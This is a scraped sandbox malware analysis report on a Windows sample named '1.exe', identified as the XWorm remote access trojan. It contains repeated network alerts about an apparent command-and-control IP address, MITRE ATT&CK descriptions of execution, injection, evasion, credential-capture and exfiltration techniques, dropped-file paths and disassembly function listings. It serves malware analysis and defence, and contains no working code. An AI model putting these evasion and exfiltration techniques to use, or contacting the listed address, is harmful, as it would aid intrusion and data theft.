Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1.exe_b4875fa730115e8f659ce4953b9a1f24949c8429_e30e42de_bb8db5a2-0d19-40a3-965b-a5cc56dcaee2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E6A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6040.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6070.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
1.exe

Function 00BE7585 Relevance: 103.8, APIs: 48, Strings: 11, Instructions: 557
libraryloaderstringCOMMON

Function 00BD15B0 Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 474
librarymemorynativeCOMMON

Function 00BD1300 Relevance: 28.7, APIs: 19, Instructions: 207
networkfilestringCOMMON

Function 00BD1100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
fileCOMMON

Function 00BE702C Relevance: 64.8, APIs: 43, Instructions: 304
COMMONLIBRARYCODE

Function 00C34416 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 421
windowCOMMON

Function 00C02092 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142
COMMON

Function 00BE34B3 Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Function 00BD1240 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64
networkCOMMON

Function 00BDAE05 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00C552B7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39
COMMON

Function 035CFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 00BD1DF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 143
windowCOMMON

Function 035D00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre